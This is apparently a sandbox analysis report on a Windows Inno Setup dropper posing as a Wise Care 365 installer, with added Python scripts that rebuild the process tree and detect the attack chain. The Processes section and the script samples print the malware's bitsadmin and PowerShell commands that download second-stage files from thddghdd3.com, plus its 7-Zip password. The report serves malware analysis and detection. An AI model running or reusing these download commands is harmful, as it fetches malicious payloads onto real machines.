Malware Analysis Report

2024-10-16 05:07

Sample ID 240725-al9jhsyhne
Target LisectAVT_2403002A_312.exe
SHA256 9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da
Tags
discovery dropper execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da

Threat Level: Known bad

The file LisectAVT_2403002A_312.exe was found to be: Known bad.

The sample is an Inno Setup package: the is-*.tmp loader started with /SL5=, and the _isetup\_iscrypt.dll and _shfoldr.dll helpers listed under Files, are Inno Setup artifacts. It bundles a "Wise Care 365 5.9.1.582.exe" installer, but before launching it the loader drops ControlSet000.bat, main.bat and 7za.exe into C:\ProgramData\ConsoleApp and runs both batch files through cmd.exe. By process order, ControlSet000.bat fetches Telemetry.xml from thddghdd3.com with bitsadmin, while main.bat fetches hfile.bin with a PowerShell WebClient, extracts a password-protected 7z archive with the dropped 7za.exe and sleeps three seconds with timeout.exe. In the Windows 7 run only the DNS lookup for thddghdd3.com was recorded and neither downloaded file appears under Files, so the second stage was not retrieved during analysis.

Malicious Activity Summary

discovery dropper execution

Download via BitsAdmin

Loads dropped DLL

Executes dropped EXE

Checks computer location settings

Command and Scripting Interpreter: PowerShell

System Location Discovery: System Language Discovery

Unsigned PE

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-25 00:19

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-25 00:19

Reported

2024-07-25 00:21

Platform

win7-20240704-en

Max time kernel

147s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe"

Signatures

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\bitsadmin.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
This NLS\Language key is read by normal Windows locale initialisation, which is why the hit appears on Microsoft system binaries such as cmd.exe, timeout.exe and bitsadmin.exe as well as on the sample; on its own it carries little weight.
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\bitsadmin.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\ConsoleApp\7za.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A

Delays execution with timeout.exe

evasion
The delay is a single timeout /T 3 /NOBREAK (three seconds, see Processes), far too short to outlast this detonation's 147 s of kernel time.
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target Count
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp N/A 2
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A 1
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A 31

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target Count
PID 2132 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp 7
PID 2316 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp C:\Windows\SysWOW64\cmd.exe 4
PID 2316 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp C:\Windows\SysWOW64\cmd.exe 4
PID 2760 wrote to memory of 2908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 4
PID 2816 wrote to memory of 2136 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe 4
PID 2760 wrote to memory of 3048 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\ConsoleApp\7za.exe 4
PID 2760 wrote to memory of 1800 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe 4
PID 2316 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe 7
PID 1988 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp 7
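
The table above logs one row per WriteProcessMemory call, so each parent/child pair repeats and the tree is hard to read at a glance. The script below is an added example, not part of the sandbox report: it parses rows in the table's own format, collapses the repeats into a count, and prints the behavioral1 process tree. The sample rows are transcribed from the table, with the first pair repeated three times to exercise the counting; the regular expression relies on the report's convention that both image paths start with C:\, which is what lets it split two paths that contain spaces.

```python
"""Rebuild the behavioral1 process tree from the WriteProcessMemory rows.

Added example, not part of the sandbox report. The sandbox logs one row per
WriteProcessMemory call, so every parent/child pair appears several times;
parsing the rows and collapsing the repeats yields the real process tree.
"""
import ntpath
import re

# Constructed sample input: one row per distinct pair, transcribed from the
# "Suspicious use of WriteProcessMemory" table above. The first pair is listed
# three times on purpose so the count logic is exercised.
SAMPLE_ROWS = r"""
PID 2132 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp
PID 2132 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp
PID 2132 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp
PID 2316 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp C:\Windows\SysWOW64\cmd.exe
PID 2316 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp C:\Windows\SysWOW64\cmd.exe
PID 2760 wrote to memory of 2908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 2136 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2760 wrote to memory of 3048 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\ConsoleApp\7za.exe
PID 2760 wrote to memory of 1800 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2316 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe
PID 1988 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp
"""

# Both image paths start with "C:\", so the first non-greedy group stops at
# the " C:\" that begins the child path even when a name contains spaces.
ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (C:\\.*?) (C:\\.*)$")


def parse_rows(text):
    """Map (parent_pid, child_pid) -> [parent_image, child_image, row_count]."""
    edges = {}
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue  # blank line or a row in another format
        key = (int(m.group(1)), int(m.group(2)))
        if key in edges:
            edges[key][2] += 1
        else:
            edges[key] = [m.group(3), m.group(4), 1]
    return edges


def build_tree(edges):
    """Return (root pids, {pid: [child pids] in report order}, {pid: image})."""
    children, images = {}, {}
    for (ppid, cpid), (pimg, cimg, _count) in edges.items():
        children.setdefault(ppid, []).append(cpid)
        images.setdefault(ppid, pimg)
        images[cpid] = cimg
    spawned = {c for kids in children.values() for c in kids}
    roots = [p for p in children if p not in spawned]
    return roots, children, images


def render_tree(edges):
    """One indented line per process, annotated with the collapsed row count."""
    roots, children, images = build_tree(edges)
    lines = []

    def walk(pid, depth, count):
        name = ntpath.basename(images[pid])
        suffix = f"  ({count} row{'s' if count != 1 else ''})" if count else ""
        lines.append("    " * depth + f"{pid} {name}{suffix}")
        for kid in children.get(pid, []):
            walk(kid, depth + 1, edges[(pid, kid)][2])

    for root in roots:
        walk(root, 0, 0)
    return lines


EDGES = parse_rows(SAMPLE_ROWS)

if __name__ == "__main__":
    print("\n".join(render_tree(EDGES)))
```

The rendered tree makes the batch-file split visible: the cmd.exe with PID 2816 only spawns bitsadmin.exe, while the cmd.exe with PID 2760 spawns powershell.exe, 7za.exe and timeout.exe, and the Wise Care installer is started by the loader itself, not by either batch file.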

Processes

C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe

"C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe"

C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp

"C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp" /SL5="$400B2,38098121,731648,C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\ProgramData\ConsoleApp\ControlSet000.bat" "

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\ProgramData\ConsoleApp\main.bat" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thddghdd3.com/hfile.bin', 'hfile.bin')"

C:\Windows\SysWOW64\bitsadmin.exe

bitsadmin /transfer Explorers /download /priority FOREGROUND http://thddghdd3.com/Telemetry.xml C:\Users\Admin\AppData\Local\Temp\Telemetry.xml

C:\ProgramData\ConsoleApp\7za.exe

7za.exe x -y -p1r7d2kvUf3 "*.7z"

C:\Windows\SysWOW64\timeout.exe

timeout /T 3 /NOBREAK

C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe

"C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe"

C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp

"C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp" /SL5="$40164,36755997,64512,C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe"

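The command lines above are exactly what a detection rule sees in process-creation telemetry (Sysmon event 1 or Windows event 4688). The script below is an added example, not part of the report: the rule names and regular expressions are the editor's, the sample events are transcribed from the Processes list, and the chain logic reflects the point that bitsadmin, a password-protected 7za extraction and timeout are each unremarkable alone but together describe this dropper. It also pulls the download URLs and the inline 7-Zip password out of the command lines as indicators.

```python
"""Flag the download-and-unpack chain in the process command lines above.

Added example, not part of the sandbox report. Each rule is a regular
expression over a single command line; the chain check then asks whether the
hits across the whole detonation add up to a dropper, which is the combination
that matters, since bitsadmin, 7za with a password and timeout are each common
in benign installers.
"""
import ntpath
import re
from urllib.parse import urlparse

# Constructed sample input: (image path, command line) for the ten processes
# listed under Processes for behavioral1.
SAMPLE_EVENTS = [
    (r"C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe",
     r'"C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe"'),
    (r"C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp",
     r'"C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp" /SL5="$400B2,38098121,731648,C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe"'),
    (r"C:\Windows\SysWOW64\cmd.exe", r'cmd /c ""C:\ProgramData\ConsoleApp\ControlSet000.bat" "'),
    (r"C:\Windows\SysWOW64\cmd.exe", r'cmd /c ""C:\ProgramData\ConsoleApp\main.bat" "'),
    (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r'''powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thddghdd3.com/hfile.bin', 'hfile.bin')"'''),
    (r"C:\Windows\SysWOW64\bitsadmin.exe",
     r"bitsadmin /transfer Explorers /download /priority FOREGROUND http://thddghdd3.com/Telemetry.xml C:\Users\Admin\AppData\Local\Temp\Telemetry.xml"),
    (r"C:\ProgramData\ConsoleApp\7za.exe", r'7za.exe x -y -p1r7d2kvUf3 "*.7z"'),
    (r"C:\Windows\SysWOW64\timeout.exe", r"timeout /T 3 /NOBREAK"),
    (r"C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe",
     r'"C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe"'),
    (r"C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp",
     r'"C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp" /SL5="$40164,36755997,64512,C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe"'),
]

# Rule names are the editor's; each pattern targets one command line.
RULES = [
    ("inno_setup_loader",                       # context, not malicious by itself
     re.compile(r"/SL5=", re.I)),
    ("batch_from_programdata",                  # cmd /c "C:\ProgramData\...\x.bat"
     re.compile(r'\bcmd(?:\.exe)?\b.*\s/c\s+"*C:\\ProgramData\\[^"]+\.bat"', re.I)),
    ("powershell_download",                     # WebClient / Invoke-WebRequest fetch
     re.compile(r"\bpowershell(?:\.exe)?\b.*(?:Net\.WebClient|DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b)", re.I)),
    ("bits_download",                           # bitsadmin /transfer ... http(s)://
     re.compile(r"\bbitsadmin(?:\.exe)?\b.*\s/transfer\b.*\bhttps?://", re.I)),
    ("7zip_password_extract",                   # 7z/7za x|e ... -p<password>
     re.compile(r"\b7za?(?:\.exe)?\b.*\s[xe]\s.*\s-p\S+", re.I)),
    ("timeout_delay",                           # timeout /T <seconds>
     re.compile(r"\btimeout(?:\.exe)?\b\s+/T\s+\d+", re.I)),
]

URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.I)


def classify(events):
    """Return [(image basename, [matching rule names])] in event order."""
    return [
        (ntpath.basename(image), [name for name, rx in RULES if rx.search(cmdline)])
        for image, cmdline in events
    ]


def dropper_chain(hits):
    """True when a LOLBin download and a password-protected unpack both occur."""
    seen = {name for _, names in hits for name in names}
    return bool(seen & {"powershell_download", "bits_download"}) and "7zip_password_extract" in seen


def archive_password(cmdline):
    """7-Zip takes the password inline as -p<password>; recover it as an indicator."""
    m = re.search(r"\s-p(\S+)", cmdline)
    return m.group(1) if m else None


def extract_urls(events):
    """Sorted, de-duplicated URLs seen in any command line."""
    return sorted({url for _, cmdline in events for url in URL_RE.findall(cmdline)})


def extract_domains(events):
    return {urlparse(url).hostname for url in extract_urls(events)}


if __name__ == "__main__":
    hits = classify(SAMPLE_EVENTS)
    for image, names in hits:
        print(f"{image:35} {', '.join(names) or '-'}")
    print("dropper chain:", dropper_chain(hits))
    print("URLs:", extract_urls(SAMPLE_EVENTS))
    print("7z password:", archive_password(SAMPLE_EVENTS[6][1]))
```

Keying the chain on the combination rather than on any single LOLBin keeps the false-positive rate down: a plain software installer that runs timeout, or a backup job that calls 7za with a password, trips one rule but not `dropper_chain`. The extracted URLs are the same two the Network section shows only a DNS lookup for, and the password is worth recording because the archive, if later recovered, cannot be opened without it.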
Network

Country Destination Domain Proto
US 8.8.8.8:53 thddghdd3.com udp

Only this DNS query was recorded: no TCP session to thddghdd3.com follows, and neither hfile.bin, Telemetry.xml nor any .7z archive appears under Files, so the bitsadmin and PowerShell downloads did not complete in this run and 7za.exe had nothing to extract.

Files

memory/2132-2-0x0000000000401000-0x00000000004A9000-memory.dmp

memory/2132-0-0x0000000000400000-0x00000000004C0000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp

MD5 f098bb35dca6ae44a05c65aac7a5444b
SHA1 c5c50d740c1b8e9d8715fc3b2c8026156295a437
SHA256 8a0163353bdcc0882008990b0479c571c91adaca143af8c03da145b28b02e1fe
SHA512 71d8fc99a67bfc1e2b3635db6092d51d2ae9ec47f652aa10234770e878ab8bfaad69f7b971d54169363763df59ebb33143d161cd2a1cb60bc6fa2bbe6ba0227b

\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

memory/2316-12-0x0000000000400000-0x000000000067B000-memory.dmp

C:\ProgramData\ConsoleApp\ControlSet000.bat

MD5 484c8df5d5bd9d82f4ac1861472cf519
SHA1 eddc0d20c81d9dba14ee0be32c7c5f563481e792
SHA256 f240f76de7e18fd3344eb7e5f4d6976a33a331ca12d0aff18032ef99bb3bf953
SHA512 6cf730eb19d4b80ce045c17b8e162448d65219be0f0e04ee02245af157ffe9cceb235c182800f44d9260cfa49c44b8e7a8c0a8d1db174a8dad75c33f60bad2b7

C:\ProgramData\ConsoleApp\main.bat

MD5 0ddc6dd98f86cff7e50c1621fd16b55a
SHA1 27e61b2bf7a367c491f25a3ef70df2ef0e38c36a
SHA256 b0a5f27817ebca5a17f75d625f1c73dc0d1c2499f1d155916d5a404013856df6
SHA512 07cb691bb23bb75c2c72c3e915b7af1f8b8c831f3d77e81c67f95c5d1ec7f754a7b823b9f1cdecd5cc511a4c34a6e8f0938eaad52f8d6451fee973ecfd2b9609

\ProgramData\ConsoleApp\7za.exe

MD5 c3d309156b8e8cf1d158de5fab1c2b40
SHA1 58ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256 993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA512 2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

memory/2132-57-0x0000000000400000-0x00000000004C0000-memory.dmp

memory/2316-58-0x0000000000400000-0x000000000067B000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe

MD5 05fda662bb382c2c95b9318b2394b246
SHA1 69365314afb6102209a806e0e474d94e58207ec6
SHA256 1cdf90593f92f8de7a6a8b812756ff9359a0a9827f0843ef40e1983f17d6b8d2
SHA512 b8d792f5529672227b94c55a2e914b8bbc569d9ce70e5c17022a5568dc51febb4fb0a497009d4975f8dc7574989041edf093285d62c34f09d5d55da09869f312

memory/1988-66-0x0000000000400000-0x0000000000417000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp

MD5 9d7850e858c24db77b91b25adf93812f
SHA1 f0bb0a9074b38dad7492422247c0a316197d26b6
SHA256 c062235322d35c79cfde7aea5fd90e9589e5fbca738ed41ab66de382e1a1b2e8
SHA512 e08084f265913a71d55750b75bbb01d1c43baa68d57eb9d6bc4ed46076577536b10901c06b92c66a926e07e268593b69936050cfacb8ed8e62b8fad86444e8ec

\Users\Admin\AppData\Local\Temp\is-A3D0Q.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/1740-84-0x0000000000600000-0x0000000000616000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-A3D0Q.tmp\ISTask.dll

MD5 86a1311d51c00b278cb7f27796ea442e
SHA1 ac08ac9d08f8f5380e2a9a65f4117862aa861a19
SHA256 e916bdf232744e00cbd8d608168a019c9f41a68a7e8390aa48cfb525276c483d
SHA512 129e4b8dd2665bcfc5e72b4585343c51127b5d027dbb0234291e7a197baeca1bab5ed074e65e5e8c969ee01f9f65cc52c9993037416de9bfff2f872e5aeba7ec

\Users\Admin\AppData\Local\Temp\is-A3D0Q.tmp\VclStylesInno.dll

MD5 b0ca93ceb050a2feff0b19e65072bbb5
SHA1 7ebbbbe2d2acd8fd516f824338d254a33b69f08d
SHA256 0e93313f42084d804b9ac4be53d844e549cfcaf19e6f276a3b0f82f01b9b2246
SHA512 37242423e62af30179906660c6dbbadca3dc2ba9e562f84315a69f3114765bc08e88321632843dbd78ba1728f8d1ce54a4edfa3b96a9d13e540aee895ae2d8e2

memory/1740-94-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-114-0x0000000007560000-0x0000000007561000-memory.dmp

memory/1740-145-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-144-0x0000000007600000-0x0000000007601000-memory.dmp

memory/1740-142-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-141-0x00000000075F0000-0x00000000075F1000-memory.dmp

memory/1740-140-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-139-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-138-0x00000000075E0000-0x00000000075E1000-memory.dmp

memory/1740-137-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-136-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-135-0x00000000075D0000-0x00000000075D1000-memory.dmp

memory/1740-134-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-132-0x00000000075C0000-0x00000000075C1000-memory.dmp

memory/1740-131-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-130-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-129-0x00000000075B0000-0x00000000075B1000-memory.dmp

memory/1740-128-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-127-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-126-0x00000000075A0000-0x00000000075A1000-memory.dmp

memory/1740-125-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-124-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-123-0x0000000007590000-0x0000000007591000-memory.dmp

memory/1740-122-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-121-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-120-0x0000000007580000-0x0000000007581000-memory.dmp

memory/1740-119-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-118-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-117-0x0000000007570000-0x0000000007571000-memory.dmp

memory/1740-116-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-115-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-113-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-112-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-111-0x0000000007550000-0x0000000007551000-memory.dmp

memory/1740-110-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-109-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-108-0x00000000024A0000-0x00000000024A1000-memory.dmp

memory/1740-107-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-106-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-105-0x0000000002490000-0x0000000002491000-memory.dmp

memory/1740-104-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-143-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-99-0x0000000002470000-0x0000000002471000-memory.dmp

memory/1740-98-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-97-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-133-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-96-0x0000000002460000-0x0000000002461000-memory.dmp

memory/1740-95-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-93-0x0000000002450000-0x0000000002451000-memory.dmp

memory/1740-92-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-91-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-103-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-102-0x0000000002480000-0x0000000002481000-memory.dmp

memory/1740-101-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-100-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-90-0x0000000001F30000-0x0000000001F31000-memory.dmp

memory/1740-88-0x00000000070F0000-0x000000000740A000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-25 00:19

Reported

2024-07-25 00:22

Platform

win10v2004-20240709-en

Max time kernel

150s

Max time network

128s

Command Line

"C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe"

Signatures

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\bitsadmin.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\Wise Care 365 5.9.1.582.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\bitsadmin.exe N/A
